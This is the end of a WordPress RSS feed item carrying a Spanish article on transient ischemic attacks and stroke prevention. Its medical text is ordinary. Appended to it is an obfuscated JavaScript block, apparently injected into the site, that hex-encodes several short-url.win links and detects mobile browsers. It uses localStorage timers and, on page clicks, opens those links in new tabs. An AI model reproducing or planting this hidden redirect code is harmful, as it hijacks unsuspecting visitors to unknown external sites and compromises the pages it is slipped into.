En el caso de los accidentes isquémicos, puede presentarse como aviso determinado tipo de manifestaciones leves consideradas “accidente isquémico transitorio” (AIT). Éste se trata de un déficit neurológico pasajero, de pocos minutos de duración, que revierte espontáneamente. Este aviso es importantísimo porque está dando evidencia de un territorio vascular amenazado que por alguna razón de suerte se destapó y pudo seguir funcionando. Es importante saber que la persona que lo padece se encuentra ante una emergencia médica, y debe concurrir a un centro especializado a realizarse los estudios porque todavía no se produjo ningún déficit.

Por eso, la prevención es crucial y desde la Fundación Cardiológica Argentina destacamos la importancia no sólo de la indicación de determinados fármacos, sino también de la adopción de estilos de vida más saludables. Si conseguimos que una persona deje de fumar, haga actividad física, mantenga un peso adecuado y disminuya el consumo de sal estaríamos descendiendo en más de la mitad el riesgo de padecer eventos cerebrovasculares.

La prevención debe ser antes y después. Son igual de importantes la prevención primaria (para evitar el ataque cerebral) y la secundaria (recomendada luego de un evento para minimizar el riesgo de padecer uno nuevo en el futuro). Si una persona no modifica sus factores de riesgo luego de haber padecido un ACV, las posibilidades de repetir la experiencia se incrementan en más del triple.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/acv-y-factores-de-riesgo-en-alerta/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">78397</post-id>	</item>
	</channel>
</rss>
